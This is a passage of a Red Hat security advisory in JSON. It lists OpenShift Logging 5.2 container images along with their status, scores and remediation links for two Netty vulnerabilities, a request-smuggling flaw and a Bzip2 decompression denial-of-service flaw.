"openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x" }, "product_reference": "openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x" }, "product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64 as a component of OpenShift Logging 5.2", "product_id": 
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64" }, "product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le" }, "product_reference": "openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64 as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64" }, "product_reference": "openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x" }, "product_reference": 
"openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" }, { "category": "default_component_of", "full_product_name": { "name": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le as a component of OpenShift Logging 5.2", "product_id": "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" }, "product_reference": "openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le", "relates_to_product_reference": "8Base-OSE-LOGGING-5.2" } ] }, "vulnerabilities": [ { "cve": "CVE-2021-21409", "cwe": { "id": "CWE-444", "name": "Inconsistent Interpretation of HTTP Requests (\u0027HTTP Request/Response Smuggling\u0027)" }, "discovery_date": "2021-03-30T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1944888" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty. There is an issue where the content-length header is not validated correctly if the request uses a single Http2HeaderFrame with the endstream set to true. This flaw leads to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1. The highest threat from this vulnerability is to integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty: Request smuggling via content-length header", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Satellite ships a vulnerable Netty version embedded in Candlepin. 
However, it is not directly vulnerable since the HTTP requests are handled by Tomcat and not by Netty.\nRed Hat OpenStack Platform\u0027s OpenDaylight will not be updated for this flaw because it was deprecated as of OpenStack Platform 14 and is only receiving security fixes for Important and Critical flaws.\n\nIn OpenShift Container Platform (OCP), the Hive/Presto/Hadoop components that comprise the OCP Metering stack, ship the vulnerable version of netty-codec-http package.\nSince the release of OCP 4.6, the Metering product has been deprecated [1], hence the affected components are marked as wontfix.\nThis may be fixed in the future.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "known_not_affected": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-21409" }, { "category": "external", "summary": "RHBZ#1944888", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1944888" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-21409", "url": "https://www.cve.org/CVERecord?id=CVE-2021-21409" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21409" }, { "category": 
"external", "summary": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32", "url": "https://github.com/netty/netty/security/advisories/GHSA-f256-j965-7f32" } ], "release_date": "2021-03-30T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-12-14T18:38:45+00:00", "details": "For OpenShift Container Platform 4.8 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.8/release_notes/ocp-4-8-release-notes.html\n\nFor Red Hat OpenShift Logging 5.2, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.7/logging/cluster-logging-upgrading.html", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:5127" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.9, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1" }, "products": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", 
"8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:33f40783cb6ac656b56a6c64208f38ef17ab8023171321551be2cd14876a1418_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:42152d9ca72d1d7d9e24386f8144382b1c4309e11b179ad18206efa7758d07c6_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch6-rhel8@sha256:c8a03e59904b96bac438e2607094dff1e652c7c42ddbba31006f7760cf17b9d8_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", 
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "netty: Request smuggling via content-length header" }, { "cve": "CVE-2021-37136", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2021-09-14T00:00:00+00:00", "flags": [ { "label": "vulnerable_code_not_present", "product_ids": [ "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-operator-bundle@sha256:0f2ab3b589e2945e2aae7a6d520f1b696c8a95292580c24b659a1579e3c857f6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:82cbec57284b21e914fad6fe3ea8244932a735da4aca2a9c74ced7689767c0b2_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:be71a022fe66b9dca3aecf7df3b9fd81e42f7f46f039ce1ae8778dcc332162e1_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/cluster-logging-rhel8-operator@sha256:e99648fe21236aef69ca9f2def30fc4970983d8835f55fbfe8d5c804ebd0e9b6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-operator-bundle@sha256:9dcc85f510f69be9e97888d5ad32629bc23554c47d8ebe397932933b289a35c2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:7fdb8b62f8fb7d1469dba362fb1d91239b31437b0be150732845a6e9eb325ef6_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:887c26a6c4356b64c9802fb3b870f79eb98a8f0f2ad1b2bbebd086c936c68fe5_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-proxy-rhel8@sha256:8d8f0cc525b00a39583ba6cdd87253c17487a9366f5fa0d6011d23e5814fd95d_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:5ee8c4ba3f91bcbb3cfa0eb2b91d3f5b04450fa2f0415e46b40b634b280e54c7_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:d8ce76443afdf4361842c2f6da80d939b2bb86081076d41e5bcb1b9858380c43_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/elasticsearch-rhel8-operator@sha256:ef2c1f7249a377b940bbdd2d52e2ab53ed6283f4e4d1290da6bb3edbb2109294_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:0796e6b8d8da736d5841d9ddeb076fdc1ca26022643f0e370bfda023f212df39_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:b565f6ce66b74161a0b6dc19246b42754db2c54a01e7f2314994544ccd514f34_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/eventrouter-rhel8@sha256:ce98ee3a74cbabe1a5eb4d2c647389824b1a3ffe7d2051668a1aac9fe1ec2dc7_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:0e10ff493ad914b7011291590e497c27cca51a587d28e9d2bd1bc89154c2b133_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:685d7f18502ac2a24a37cdb9ae74616098d3843f80e9d9f0e8dd27930ca174a9_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/fluentd-rhel8@sha256:7dd06969de6e2d0345fb6595c24526e184030a1d2c50ffae0d201f0bfd33abb4_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:a2d914120d489c00d8d8c40cf9f1fa1ba627c5e386fc113ae9299113dee253ca_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d5c47750ae81e99b3cc4f9f71127cb394b69b747177c08c53768df8b8b52ba65_ppc64le", "8Base-OSE-LOGGING-5.2:openshift-logging/kibana6-rhel8@sha256:d7fa8453d07409cd344cde67e772fb4d2941398b853ce1ea3bcaf6135d5645c1_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:67e23735a1005bb7f06d3f05677bfe8c38bccc5bfc1cc4cf16832ddeda29931a_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:9c2decd7838d0e1a56c27ff7fa8af82ed2ac33d0618240b80d26fd932f5804f2_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/log-file-metric-exporter-rhel8@sha256:cb884b83fecaa7d6f4aae548fd299568edf59feb5d752704dcd4598b1f826ff1_ppc64le", 
"8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:1982a509b8a209720b92fba4812a3fcc5ce0e519908cdec876beb92f895699fa_amd64", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:66e46f68e5313e4f58cfd3b6fccb8edeb97a574210bff799d0bd5471b73f9f62_s390x", "8Base-OSE-LOGGING-5.2:openshift-logging/logging-curator5-rhel8@sha256:d3b3ab31d012a82acb832e705f1a5ba60912d1b32dd035fad9106f1088de35a8_ppc64le" ] } ], "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "2004133" } ], "notes": [ { "category": "description", "text": "A flaw was found in Netty\u0027s netty-codec due to size restrictions for decompressed data in the Bzip2Decoder. By sending a specially-crafted input, a remote attacker could cause a denial of service.", "title": "Vulnerability description" }, { "category": "summary", "text": "netty-codec: Bzip2Decoder doesn\u0027t allow setting size restrictions for decompressed data", "title": "Vulnerability summary" }, { "category": "other", 